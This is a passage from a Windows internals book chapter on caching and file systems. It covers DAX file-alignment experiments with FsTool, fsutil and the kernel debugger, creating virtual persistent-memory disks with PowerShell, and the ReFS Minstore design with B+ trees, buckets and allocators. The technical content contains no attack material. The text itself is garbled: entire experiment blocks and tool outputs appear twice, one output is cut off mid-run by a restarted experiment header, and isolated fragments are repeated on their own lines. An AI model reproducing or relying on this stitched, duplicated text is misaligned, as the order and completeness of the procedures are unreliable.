volume by using a standard copy operation, started by the FsTool application:
D:\>fstool.exe /copy p:\Big_DVD_Image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_DVD_Image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 10 Sec - Transfer Rate: 495.52 MB/s.
Press any key to exit...
You can check the new test.iso file’s alignment by using the /queryalign command-line argu-
ment of the FsTool.exe application, or by using the queryFileAlignment argument with the built-in
fsutil.exe tool available in Windows:
D:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region
Alignment
StartOffset
LengthInBytes
0
Other
0
0x1fd000
1
Large
0x1fd000
0x3b800000
2
Huge
0x3b9fd000
0xc0000000
3
Large
0xfb9fd000
0x13e00000
4
Other
0x10f7fd000
0x17e000
As you can read from the tool’s output, the first chunk of the file has been stored in 4-KB aligned
clusters. The offsets shown by the tool are not volume-relative offsets, or LCN, but file-relative
offsets, or VCN. This is an important distinction because the alignment needed for large and huge
pages mapping is relative to the volume’s page offset. As the file keeps growing, some of its clus-
ters will be allocated from a volume offset that is 2-MB or 1-GB aligned. In this way, those portions
of the file can be mapped by the memory manager using large and huge pages. Now, as in the
previous experiment, let’s try to perform a DAX copy by specifying a target alignment hint:
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso /align:1GB
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: True.
EXPERIMENT: Playing with DAX file alignment
You can witness the different kinds of DAX file alignment using the FsTool application available
in this book’s downloadable resources. For this experiment, you need to have a DAX volume
present on your machine. Open a command prompt window and perform the copy of a big file
(we suggest at least 4 GB) into the DAX volume using this tool. In the following example, two
DAX disks are mounted as the P: and Q: volumes. The Big_Image.iso file is copied into the Q: DAX
volume by using a standard copy operation, started by the FsTool application:
D:\>fstool.exe /copy p:\Big_DVD_Image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_DVD_Image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 10 Sec - Transfer Rate: 495.52 MB/s.
Press any key to exit...
You can check the new test.iso file’s alignment by using the /queryalign command-line argu-
ment of the FsTool.exe application, or by using the queryFileAlignment argument with the built-in
queryFileAlignment argument with the built-in
queryFileAlignment
fsutil.exe tool available in Windows:
D:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region
Alignment
StartOffset
LengthInBytes
0
Other
0
0x1fd000
1
Large
0x1fd000
0x3b800000
2
Huge
0x3b9fd000
0xc0000000
3
Large
0xfb9fd000
0x13e00000
4
Other
0x10f7fd000
0x17e000
As you can read from the tool’s output, the first chunk of the file has been stored in 4-KB aligned
clusters. The offsets shown by the tool are not volume-relative offsets, or LCN, but file-relative
offsets, or VCN. This is an important distinction because the alignment needed for large and huge
pages mapping is relative to the volume’s page offset. As the file keeps growing, some of its clus-
ters will be allocated from a volume offset that is 2-MB or 1-GB aligned. In this way, those portions
of the file can be mapped by the memory manager using large and huge pages. Now, as in the
previous experiment, let’s try to perform a DAX copy by specifying a target alignment hint:
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso /align:1GB
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: True.
734
CHAPTER 11
Caching and file systems
Target Volume: q:\ - File system: NTFS - Is DAX Volume: False.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy... Success!
Total execution time: 6 Sec.
Copy Speed: 618.81 MB/Sec
Press any key to exit...
P:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region
Alignment
StartOffset
LengthInBytes
0
Huge
0
0x100000000
1
Large
0x100000000
0xf800000
2
Other
0x10f800000
0x17b000
In the latter case, the file was immediately allocated on the next 1-GB aligned cluster. The first
4-GB (0x100000000 bytes) of the file content are stored in contiguous space. When the memory
manager maps that part of the file, it only needs to use four page director pointer table entries
(PDPTs), instead of using 2048 page tables. This will save physical memory space and drastically
improve the performance while the processor accesses the data located in the DAX section.
To confirm that the copy has been really executed using large pages, you can attach a kernel
debugger to the machine (even a local kernel debugger is enough) and use the /debug switch of
the FsTool application:
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso /align:1GB /debug
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy...
[Debug] (PID: 10412) Source and Target file correctly mapped.
Source file mapping address: 0x000001F1C0000000 (DAX mode: 1).
Target file mapping address: 0x000001F2C0000000 (DAX mode: 1).
File offset : 0x0 - Alignment: 1GB.
Press enter to start the copy...
[Debug] (PID: 10412) File chunk’s copy successfully executed.
Press enter go to the next chunk / flush the file...
Target Volume: q:\ - File system: NTFS - Is DAX Volume: False.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy... Success!
Total execution time: 6 Sec.
Copy Speed: 618.81 MB/Sec
Press any key to exit...
P:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region
Alignment
StartOffset
LengthInBytes
0
Huge
0
0x100000000
1
Large
0x100000000
0xf800000
2
Other
0x10f800000
0x17b000
In the latter case, the file was immediately allocated on the next 1-GB aligned cluster. The first
4-GB (0x100000000 bytes) of the file content are stored in contiguous space. When the memory
manager maps that part of the file, it only needs to use four page director pointer table entries
(PDPTs), instead of using 2048 page tables. This will save physical memory space and drastically
improve the performance while the processor accesses the data located in the DAX section.
To confirm that the copy has been really executed using large pages, you can attach a kernel
debugger to the machine (even a local kernel debugger is enough) and use the /debug switch of
the FsTool application:
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso /align:1GB /debug
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume: False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume: True.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy...
[Debug] (PID: 10412) Source and Target file correctly mapped.
Source file mapping address: 0x000001F1C0000000 (DAX mode: 1).
Target file mapping address: 0x000001F2C0000000 (DAX mode: 1).
File offset : 0x0 - Alignment: 1GB.
Press enter to start the copy...
[Debug] (PID: 10412) File chunk’s copy successfully executed.
Press enter go to the next chunk / flush the file...
CHAPTER 11
Caching and file systems
735
You can see the effective memory mapping using the debugger’s !pte extension. First, you
need to move to the proper process context by using the .process command, and then you can
analyze the mapped virtual address shown by FsTool:
8: kd> !process 0n10412 0
Searching for Process with Cid == 28ac
PROCESS ffffd28124121080
SessionId: 2 Cid: 28ac Peb: a29717c000 ParentCid: 31bc
DirBase: 4cc491000 ObjectTable: ffff950f94060000 HandleCount: 49.
Image: FsTool.exe
8: kd> .process /i ffffd28124121080
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
8: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`3d7e8e50 cc int 3
8: kd> !pte 0x000001F2C0000000
VA 000001f2c0000000
PXE at FFFFB8DC6E371018 PPE at FFFFB8DC6E203E58 PDE at FFFFB8DC407CB000
contains 0A0000D57CEA8867 contains 8A000152400008E7 contains 0000000000000000
pfn d57cea8 ---DA--UWEV pfn 15240000 --LDA--UW-V
LARGE PAGE pfn 15240000
PTE at FFFFB880F9600000
contains 0000000000000000
LARGE PAGE pfn 15240000
The pte debugger command confirmed that the first 1 GB of space of the DAX file is mapped
using huge pages. Indeed, neither the page directory nor the page table are present. The FsTool
application can also be used to set the alignment of already existing files. The FSCTL_SET_DAX_
ALLOC_ALIGNMENT_HINT control code does not actually move any data though; it just provides
a hint for the new allocated file extents, as the file continues to grow in the future:
D:\>fstool e:\test.iso /align:2MB /offset:0
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Applying file alignment to "test.iso" (Offset 0x0)... Success.
Press any key to exit...
D:\>fsutil dax queryfileAlignment e:\test.iso
File Region Alignment:
Region
Alignment
StartOffset
LengthInBytes
0
Huge
0
0x100000000
1
Large
0x100000000
0xf800000
2
Other
0x10f800000
0x17b000
You can see the effective memory mapping using the debugger’s !pte extension. First, you
need to move to the proper process context by using the .process command, and then you can
analyze the mapped virtual address shown by FsTool:
8: kd> !process 0n10412 0
Searching for Process with Cid == 28ac
PROCESS ffffd28124121080
SessionId: 2 Cid: 28ac Peb: a29717c000 ParentCid: 31bc
DirBase: 4cc491000 ObjectTable: ffff950f94060000 HandleCount: 49.
Image: FsTool.exe
8: kd> .process /i ffffd28124121080
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
8: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`3d7e8e50 cc int 3
8: kd> !pte 0x000001F2C0000000
VA 000001f2c0000000
PXE at FFFFB8DC6E371018 PPE at FFFFB8DC6E203E58 PDE at FFFFB8DC407CB000
contains 0A0000D57CEA8867 contains 8A000152400008E7 contains 0000000000000000
pfn d57cea8 ---DA--UWEV pfn 15240000 --LDA--UW-V
LARGE PAGE pfn 15240000
PTE at FFFFB880F9600000
contains 0000000000000000
LARGE PAGE pfn 15240000
The pte debugger command confirmed that the first 1 GB of space of the DAX file is mapped
using huge pages. Indeed, neither the page directory nor the page table are present. The FsTool
application can also be used to set the alignment of already existing files. The FSCTL_SET_DAX_
ALLOC_ALIGNMENT_HINT control code does not actually move any data though; it just provides
ALLOC_ALIGNMENT_HINT control code does not actually move any data though; it just provides
ALLOC_ALIGNMENT_HINT
a hint for the new allocated file extents, as the file continues to grow in the future:
D:\>fstool e:\test.iso /align:2MB /offset:0
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Applying file alignment to "test.iso" (Offset 0x0)... Success.
Press any key to exit...
D:\>fsutil dax queryfileAlignment e:\test.iso
File Region Alignment:
Region
Alignment
StartOffset
LengthInBytes
0
Huge
0
0x100000000
1
Large
0x100000000
0xf800000
2
Other
0x10f800000
0x17b000
736
CHAPTER 11
Caching and file systems
Virtual PM disks and storages spaces support
Persistent memory was specifically designed for server systems and mission-critical applications, like
huge SQL databases, which need a fast response time and process thousands of queries per second.
Often, these kinds of servers run applications in virtual machines provided by HyperV. Windows Server
2019 supports a new kind of virtual hard disk: virtual PM disks. Virtual PMs are backed by a VHDPMEM
file, which, at the time of this writing, can only be created (or converted from a regular VHD file) by
using Windows PowerShell. Virtual PM disks directly map chunks of space located on a real DAX disk
installed in the host, via a VHDPMEM file, which must reside on that DAX volume.
When attached to a virtual machine, HyperV exposes a virtual PM device (VPMEM) to the guest. This
virtual PM device is described by the NVDIMM Firmware interface table (NFIT) located in the virtual
UEFI BIOS. (More details about the NVFIT table are available in the ACPI 6.2 specification.) The SCM Bus
driver reads the table and creates the regular device objects representing the virtual NVDIMM device
and the PM disk. The Pmem disk class driver manages the virtual PM disks in the same way as normal
PM disks, and creates virtual volumes on the top of them. Details about the Windows Hypervisor and
its components can be found in Chapter 9. Figure 11-77 shows the PM stack for a virtual machine that
uses a virtual PM device. The dark gray components are parts of the virtualized stack, whereas light
gray components are the same in both the guest and the host partition.
PMEM Disk
PMEM Disk
VHDPMEM
File
NTFS (DAX)
NTFS (DAX)
NVDIMM
NVDIMM
Host PMEM driver stack
VID
BIOS VDEV
VPMEM VDEV
Persistent region
Persistent
region
Guest
PMEM-aware
file system
Guest
PMEM driver
stack
Virtual PMEM
device
Host physical address space
Worker process
Host
Guest
Provides guest
NFIT
Describe
NVDIMM layout
Open
VHDPMEM File
ACPI
NFIT
FIGURE 11-77 The virtual PM architecture.
A virtual PM device exposes a contiguous address space, virtualized from the host (this means that
the host VHDPMEM files don’t not need to be contiguous). It supports both DAX and block mode,
which, as in the host case, must be decided at volume-format time, and supports large and huge pages,
which are leveraged in the same way as on the host system. Only generation 2 virtual machines support
virtual PM devices and the mapping of VHDPMEM files.
Storage Spaces Direct in Windows Server 2019 also supports DAX disks in its virtual storage pools. One
or more DAX disks can be part of an aggregated array of mixed-type disks. The PM disks in the array can
be configured to provide the capacity or performance tier of a bigger tiered virtual disk or can be config-
ured to act as a high-performance cache. More details on Storage Spaces are available later in this chapter.
CHAPTER 11
Caching and file systems
737
EXPERIMENT: Create and mount a VHDPMEM image
As discussed in the previous paragraph, virtual PM disks can be created, converted, and assigned
to a HyperV virtual machine using PowerShell. In this experiment, you need a DAX disk and a
generation 2 virtual machine with Windows 10 October Update (RS5, or later releases) installed
(describing how to create a VM is outside the scope of this experiment). Open an administrative
Windows PowerShell prompt, move to your DAX-mode disk, and create the virtual PM disk (in
the example, the DAX disk is located in the Q: drive):
PS Q:\> New-VHD VmPmemDis.vhdpmem -Fixed -SizeBytes 256GB -PhysicalSectorSizeBytes 4096
ComputerName
: 37-4611k2635
Path
: Q:\VmPmemDis.vhdpmem
VhdFormat
: VHDX
VhdType
: Fixed
FileSize
: 274882101248
Size
: 274877906944
MinimumSize :
LogicalSectorSize
: 4096
PhysicalSectorSize
: 4096
BlockSize : 0
ParentPath :
DiskIdentifier
: 3AA0017F-03AF-4948-80BE-B40B4AA6BE24
FragmentationPercentage : 0
Alignment : 1
Attached
: False
DiskNumber :
IsPMEMCompatible : True
AddressAbstractionType : None
Number :
Virtual PM disks can be of fixed size only, meaning that all the space is allocated for the virtual
disk—this is by design. The second step requires you to create the virtual PM controller and at-
tach it to your virtual machine. Make sure that your VM is switched off, and type the following
command. You should replace “TestPmVm” with the name of your virtual machine):
PS Q:\> Add-VMPmemController -VMName "TestPmVm"
Finally, you need to attach the created virtual PM disk to the virtual machine’s PM controller:
PS Q:\> Add-VMHardDiskDrive "TestVm" PMEM -ControllerLocation 1 -Path 'Q:\VmPmemDis.vhdpmem'
You can verify the result of the operation by using the Get-VMPmemController command:
PS Q:\> Get-VMPmemController -VMName "TestPmVm"
VMName ControllerNumber Drives
------ ---------------- ------
TestPmVm 0
{Persistent Memory Device on PMEM controller number 0 at location 1}
If you switch on your virtual machine, you will find that Windows detects a new virtual disk. In
the virtual machine, open the Disk Management MMC snap-in Tool (diskmgmt.msc) and initialize
the disk using GPT partitioning. Then create a simple volume, assign a drive letter to it, but don’t
format it.
EXPERIMENT: Create and mount a VHDPMEM image
As discussed in the previous paragraph, virtual PM disks can be created, converted, and assigned
to a HyperV virtual machine using PowerShell. In this experiment, you need a DAX disk and a
generation 2 virtual machine with Windows 10 October Update (RS5, or later releases) installed
(describing how to create a VM is outside the scope of this experiment). Open an administrative
Windows PowerShell prompt, move to your DAX-mode disk, and create the virtual PM disk (in
the example, the DAX disk is located in the Q: drive):
PS Q:\> New-VHD VmPmemDis.vhdpmem -Fixed -SizeBytes 256GB -PhysicalSectorSizeBytes 4096
ComputerName
: 37-4611k2635
Path
: Q:\VmPmemDis.vhdpmem
VhdFormat
: VHDX
VhdType
: Fixed
FileSize
: 274882101248
Size
: 274877906944
MinimumSize :
LogicalSectorSize
: 4096
PhysicalSectorSize
: 4096
BlockSize : 0
ParentPath :
DiskIdentifier
: 3AA0017F-03AF-4948-80BE-B40B4AA6BE24
FragmentationPercentage : 0
Alignment : 1
Attached
: False
DiskNumber :
IsPMEMCompatible : True
AddressAbstractionType : None
Number :
Virtual PM disks can be of fixed size only, meaning that all the space is allocated for the virtual
disk—this is by design. The second step requires you to create the virtual PM controller and at-
tach it to your virtual machine. Make sure that your VM is switched off, and type the following
command. You should replace “TestPmVm” with the name of your virtual machine):
“TestPmVm” with the name of your virtual machine):
“TestPmVm”
PS Q:\> Add-VMPmemController -VMName "TestPmVm"
Finally, you need to attach the created virtual PM disk to the virtual machine’s PM controller:
PS Q:\> Add-VMHardDiskDrive "TestVm" PMEM -ControllerLocation 1 -Path 'Q:\VmPmemDis.vhdpmem'
You can verify the result of the operation by using the Get-VMPmemController command:
PS Q:\> Get-VMPmemController -VMName "TestPmVm"
VMName ControllerNumber Drives
------ ---------------- ------
TestPmVm 0
{Persistent Memory Device on PMEM controller number 0 at location 1}
If you switch on your virtual machine, you will find that Windows detects a new virtual disk. In
the virtual machine, open the Disk Management MMC snap-in Tool (diskmgmt.msc) and initialize
the disk using GPT partitioning. Then create a simple volume, assign a drive letter to it, but don’t
format it.
738
CHAPTER 11
Caching and file systems
You need to format the virtual PM disk in DAX mode. Open an administrative command
prompt window in the virtual machine. Assuming that your virtual-pm disk drive letter is E:, you
need to use the following command:
C:\>format e: /DAX /fs:NTFS /q
The type of the file system is RAW.
The new file system is NTFS.
WARNING, ALL DATA ON NON-REMOVABLE DISK
DRIVE E: WILL BE LOST!
Proceed with Format (Y/N)? y
QuickFormatting 256.0 GB
Volume label (32 characters, ENTER for none)? DAX-In-Vm
Creating file system structures.
Format complete.
256.0 GB total disk space.
255.9 GB are available.
You need to format the virtual PM disk in DAX mode. Open an administrative command
prompt window in the virtual machine. Assuming that your virtual-pm disk drive letter is E:, you
need to use the following command:
C:\>format e: /DAX /fs:NTFS /q
The type of the file system is RAW.
The new file system is NTFS.
WARNING, ALL DATA ON NON-REMOVABLE DISK
DRIVE E: WILL BE LOST!
Proceed with Format (Y/N)? y
QuickFormatting 256.0 GB
Volume label (32 characters, ENTER for none)? DAX-In-Vm
Creating file system structures.
Format complete.
256.0 GB total disk space.
255.9 GB are available.
CHAPTER 11
Caching and file systems
739
You can then confirm that the virtual disk has been formatted in DAX mode by using the
fsutil.exe built-in tool, specifying the fsinfo volumeinfo command-line arguments:
C:\>fsutil fsinfo volumeinfo C:
Volume Name : DAX-In-Vm
Volume Serial Number : 0x1a1bdc32
Max Component Length : 255
File System Name : NTFS
Is ReadWrite
Not Thinly-Provisioned
Supports Case-sensitive filenames
Preserves Case of filenames
Supports Unicode in filenames
Preserves & Enforces ACL’s
Supports Disk Quotas
Supports Reparse Points
Returns Handle Close Result Information
Supports POSIX-style Unlink and Rename
Supports Object Identifiers
Supports Named Streams
Supports Hard Links
Supports Extended Attributes
Supports Open By FileID
Supports USN Journal
Is DAX Volume
Resilient File System (ReFS)
The release of Windows Server 2012 R2 saw the introduction of a new advanced file system, the
Resilient File System (also known as ReFS). This file system is part of a new storage architecture, called
Storage Spaces, which, among other features, allows the creation of a tiered virtual volume composed
of a solid-state drive and a classical rotational disk. (An introduction of Storage Spaces, and Tiered
Storage, is presented later in this chapter). ReFS is a “write-to-new” file system, which means that file
system metadata is never updated in place; updated metadata is written in a new place, and the old
one is marked as deleted. This property is important and is one of the features that provides data
integrity. The original goals of ReFS were the following:
1.
Self-healing, online volume check and repair (providing close to zero unavailability due to file
system corruption) and write-through support. (Write-through is discussed later in this section.)
2.
Data integrity for all user data (hardware and software).
3.
Efficient and fast file snapshots (block cloning).
4.
Support for extremely large volumes (exabyte sizes) and files.
5.
Automatic tiering of data and metadata, support for SMR (shingled magnetic recording) and
future solid-state disks.
You can then confirm that the virtual disk has been formatted in DAX mode by using the
fsutil.exe built-in tool, specifying the fsinfo volumeinfo command-line arguments:
C:\>fsutil fsinfo volumeinfo C:
Volume Name : DAX-In-Vm
Volume Serial Number : 0x1a1bdc32
Max Component Length : 255
File System Name : NTFS
Is ReadWrite
Not Thinly-Provisioned
Supports Case-sensitive filenames
Preserves Case of filenames
Supports Unicode in filenames
Preserves & Enforces ACL’s
Supports Disk Quotas
Supports Reparse Points
Returns Handle Close Result Information
Supports POSIX-style Unlink and Rename
Supports Object Identifiers
Supports Named Streams
Supports Hard Links
Supports Extended Attributes
Supports Open By FileID
Supports USN Journal
Is DAX Volume
740
CHAPTER 11
Caching and file systems
There have been different versions of ReFS. The one described in this book is referred to as ReFS v2,
which was first implemented in Windows Server 2016. Figure 11-78 shows an overview of the different
high-level implementations between NTFS and ReFS. Instead of completely rewriting the NTFS file
system, ReFS uses another approach by dividing the implementation of NTFS into two parts: one part
understands the on-disk format, and the other does not.
New on-disk store engine
Minstore
ReFS.SYS
NTFS.SYS
NTFS on-disk store engine
Upper layer
engine inherited from NTFS
NTFS upper layer
API/semantics engine
FIGURE 11-78 ReFS high-level implementation compared to NTFS.
ReFS replaces the on-disk storage engine with Minstore. Minstore is a recoverable object store li-
brary that provides a key-value table interface to its callers, implements allocate-on-write semantics for
modification to those tables, and integrates with the Windows cache manager. Essentially, Minstore is a
library that implements the core of a modern, scalable copy-on-write file system. Minstore is leveraged
by ReFS to implement files, directories, and so on. Understanding the basics of Minstore is needed to
describe ReFS, so let’s start with a description of Minstore.
Minstore architecture
Everything in Minstore is a table. A table is composed of multiple rows, which are made of a key-value
pair. Minstore tables, when stored on disk, are represented using B+ trees. When kept in volatile
memory (RAM), they are represented using hash tables. B+ trees, also known as balanced trees, have
different important properties:
1.
They usually have a large number of children per node.
2.
They store data pointers (a pointer to the disk file block that contains the key value) only on the
leaves—not on internal nodes.
3.
Every path from the root node to a leaf node is of the same length.
CHAPTER 11
Caching and file systems
741
Other file systems (like NTFS) generally use B-trees (another data structure that generalizes a binary
search-tree, not to be confused with the term “Binary tree”) to store the data pointer, along with the
key, in each node of the tree. This technique greatly reduces the number of entries that can be packed
into a node of a B-tree, thereby contributing to the increase in the number of levels in the B-tree, hence
increasing the search time of a record.
Figure 11-79 shows an example of B+ tree. In the tree shown in the figure, the root and the internal
node contain only keys, which are used for properly accessing the data located in the leaf’s nodes. Leaf
nodes are all at the same level and are generally linked together. As a consequence, there is no need to
emit lots of I/O operations for finding an element in the tree.
For example, let’s assume that Minstore needs to access the node with the key 20. The root node
contains one key used as an index. Keys with a value above or equal to 13 are stored in one of the chil-
dren indexed by the right pointer; meanwhile, keys with a value less than 13 are stored in one of the left
children. When Minstore has reached the leaf, which contains the actual data, it can easily access the
data also for node with keys 16 and 25 without performing any full tree scan.
Furthermore, the leaf nodes are usually linked together using linked lists. This means that for huge
trees, Minstore can, for example, query all the files in a folder by accessing the root and the intermedi-
ate nodes only once—assuming that in the figure all the files are represented by the values stored in
the leaves. As mentioned above, Minstore generally uses a B+ tree for representing different objects
than files or directories.
13
1
4
9
10
11 12
13 15
16 20 25
9
11
16
FIGURE 11-79 A sample B+ tree. Only the leaf nodes contain data pointers. Director nodes contain only links to
children nodes.
In this book, we use the term B+ tree and B+ table for expressing the same concept. Minstore
defines different kind of tables. A table can be created, it can have rows added to it, deleted from it, or
updated inside of it. An external entity can enumerate the table or find a single row. The Minstore core
is represented by the object table. The object table is an index of the location of every root (nonem-
bedded) B+ trees in the volume. B+ trees can be embedded within other trees; a child tree’s root is
stored within the row of a parent tree.
Each table in Minstore is defined by a composite and a schema. A composite is just a set of rules
that describe the behavior of the root node (sometimes even the children) and how to find and ma-
nipulate each node of the B+ table. Minstore supports two kinds of root nodes, managed by their
respective composites:
742
CHAPTER 11
Caching and file systems
I
Copy on Write (CoW): This kind of root node moves its location when the tree is modified. This
means that in case of modification, a brand-new B+ tree is written while the old one is marked
for deletion. In order to deal with these nodes, the corresponding composite needs to maintain
an object ID that will be used when the table is written.
I
Embedded: This kind of root node is stored in the data portion (the value of a leaf node) of an
index entry of another B+ tree. The embedded composite maintains a reference to the index
entry that stores the embedded root node.
Specifying a schema when the table is created tells Minstore what type of key is being used, how big
the root and the leaf nodes of the table should be, and how the rows in the table are laid out. ReFS uses
different schemas for files and directories. Directories are B+ table objects referenced by the object
table, which can contain three different kinds of rows (files, links, and file IDs). In ReFS, the key of each
row represents the name of the file, link, or file ID. Files are tables that contain attributes in their rows
(attribute code and value pairs).
Every operation that can be performed on a table (close, modify, write to disk, or delete) is repre-
sented by a Minstore transaction. A Minstore transaction is similar to a database transaction: a unit of
work, sometimes made up of multiple operations, that can succeed or fail only in an atomic way. The
way in which tables are written to the disk is through a process known as updating the tree. When a tree
update is requested, transactions are drained from the tree, and no transactions are allowed to start
until the update is finished.
One important concept used in ReFS is the embedded table: a B+ tree that has the root node located
in a row of another B+ tree. ReFS uses embedded tables extensively. For example, every file is a B+ tree
whose roots are embedded in the row of directories. Embedded tables also support a move operation
that changes the parent table. The size of the root node is fixed and is taken from the table’s schema.
B+ tree physical layout
In Minstore, a B+ tree is made of buckets. Buckets are the Minstore equivalent of the general B+ tree
nodes. Leaf buckets contain the data that the tree is storing; intermediate buckets are called director nodes
and are used only for direct lookups to the next level in the tree. (In Figure 11-79, each node is a bucket.)
Because director nodes are used only for directing traffic to child buckets, they need not have exact
copies of a key in a child bucket but can instead pick a value between two buckets and use that. (In
ReFS, usually the key is a compressed file name.) The data of an intermediate bucket instead contains
both the logical cluster number (LCN) and a checksum of the bucket that it’s pointing to. (The check-
sum allows ReFS to implement self-healing features.) The intermediate nodes of a Minstore table could
be considered as a Merkle tree, in which every leaf node is labelled with the hash of a data block, and
every nonleaf node is labelled with the cryptographic hash of the labels of its child nodes.
Every bucket is composed of an index header that describes the bucket, and a footer, which is an array
of offsets pointing to the index entries in the correct order. Between the header and the footer there are
the index entries. An index entry represents a row in the B+ table; a row is a simple data structure that
gives the location and size of both the key and data (which both reside in the same bucket). Figure 11-80
shows an example of a leaf bucket containing three rows, indexed by the offsets located in the footer. In
leaf pages, each row contains the key and the actual data (or the root node of another embedded tree).
CHAPTER 11
Caching and file systems
743
# Rows
0x20
0x100
0x80
# Free Bytes
Row 1
Row 3
Row 2
First Row
Offset
Row Offset
Array Start
FIGURE 11-80 A leaf bucket with three index entries that are ordered by the array of offsets in the footer.
Allocators
When the file system asks Minstore to allocate a bucket (the B+ table requests a bucket with a process
called pinning the bucket), the latter needs a way to keep track of the free space of the underlaying me-
dium. The first version of Minstore used a hierarchical allocator, which meant that there were multiple
allocator objects, each of which allocated space out of its parent allocator. When the root allocator
mapped the entire space of the volume, each allocator became a B+ tree that used the lcn-count table
schema. This schema describes the row’s key as a range of LCN that the allocator has taken from its par-
ent node, and the row’s value as an allocator region. In the original implementation, an allocator region
described the state of each chunk in the region in relation to its children nodes: free or allocated and
the owner ID of the object that owns it.
Figure 11-81 shows a simplified version of the original implementation of the hierarchical allocator.
In the picture, a large allocator has only one allocation unit set: the space represented by the bit has
been allocated for the medium allocator, which is currently empty. In this case, the medium allocator
is a child of the large allocator.
key
{0 - 0x3FFFFF}
value
{10000000000000000000000000000…}
{0x400000 - …}
{00000000000000000000000000000…}
{0 - 0x000FFF}
{00000000000000000000000000000…}
FIGURE 11-81 The old hierarchical allocator.
B+ tables deeply rely on allocators to get new buckets and to find space for the copy-on-write cop-
ies of existing buckets (implementing the write-to-new strategy). The latest Minstore version replaced
the hierarchical allocator with a policy-driven allocator, with the goal of supporting a central loca-
tion in the file system that would be able to support tiering. A tier is a type of the storage device—for
744
CHAPTER 11
Caching and file systems
example, an SSD, NVMe, or classical rotational disk. Tiering is discussed later in this chapter. It is basi-
cally the ability to support a disk composed of a fast random-access zone, which is usually smaller than
the slow sequential-only area.
The new policy-driven allocator is an optimized version (supporting a very large number of allocations
per second) that defines different allocation areas based on the requested tier (the type of underlying
storage device). When the file system requests space for new data, the central allocator decides which
area to allocate from by a policy-driven engine. This policy engine is tiering-aware (this means that
metadata is always written to the performance tiers and never to SMR capacity tiers, due to the random-
write nature of the metadata), supports ReFS bands, and implements deferred allocation logic (DAL). The
deferred allocation logic relies on the fact that when the file system creates a file, it usually also allocates
the needed space for the file content. Minstore, instead of returning to the underlying file system an
LCN range, returns a token containing the space reservation that provides a guarantee against the disk
becoming full. When the file is ultimately written, the allocator assigns LCNs for the file’s content and
updates the metadata. This solves problems with SMR disks (which are covered later in this chapter) and
allows ReFS to be able to create even huge files (64 TB or more) in less than a second.
The policy-driven allocator is composed of three central allocators, implemented on-disk as global
B+ tables. When they’re loaded in memory, the allocators are represented using AVL trees, though. An
AVL tree is another kind of self-balancing binary tree that’s not covered in this book. Although each
row in the B+ table is still indexed by a range, the data part of the row could contain a bitmap or, as
an optimization, only the number of allocated clusters (in case the allocated space is contiguous). The
three allocators are used for different purposes:
I
The Medium Allocator (MAA) is the allocator for each file in the namespace, except for some B+
tables allocated from the other allocators. The Medium Allocator is a B+ table itself, so it needs
to find space for its metadata updates (which still follow the write-to-new strategy). This is the
role of the Small Allocator (SAA).
I
The Small Allocator (SAA) allocates space for itself, for the Medium Allocator, and for two
tables: the Integrity State table (which allows ReFS to support Integrity Streams) and the Block
Reference Counter table (which allows ReFS to support a file’s block cloning).
I
The Container Allocator (CAA) is used when allocating space for the container table, a funda-
mental table that provides cluster virtualization to ReFS and is also deeply used for container
compaction. (See the following sections for more details.) Furthermore, the Container Allocator
contains one or more entries for describing the space used by itself.
When the Format tool initially creates the basic data structures for ReFS, it creates the three alloca-
tors. The Medium Allocator initially describes all the volume’s clusters. Space for the SAA and CAA
metadata (which are B+ tables) is allocated from the MAA (this is the only time that ever happens in
the volume lifetime). An entry for describing the space used by the Medium Allocator is inserted in the
SAA. Once the allocators are created, additional entries for the SAA and CAA are no longer allocated
from the Medium Allocator (except in case ReFS finds corruption in the allocators themselves).
CHAPTER 11
Caching and file systems
745
To perform a write-to-new operation for a file, ReFS must first consult the MAA allocator to find
space for the write to go to. In a tiered configuration, it does so with awareness of the tiers. Upon suc-
cessful completion, it updates the file’s stream extent table to reflect the new location of that extent
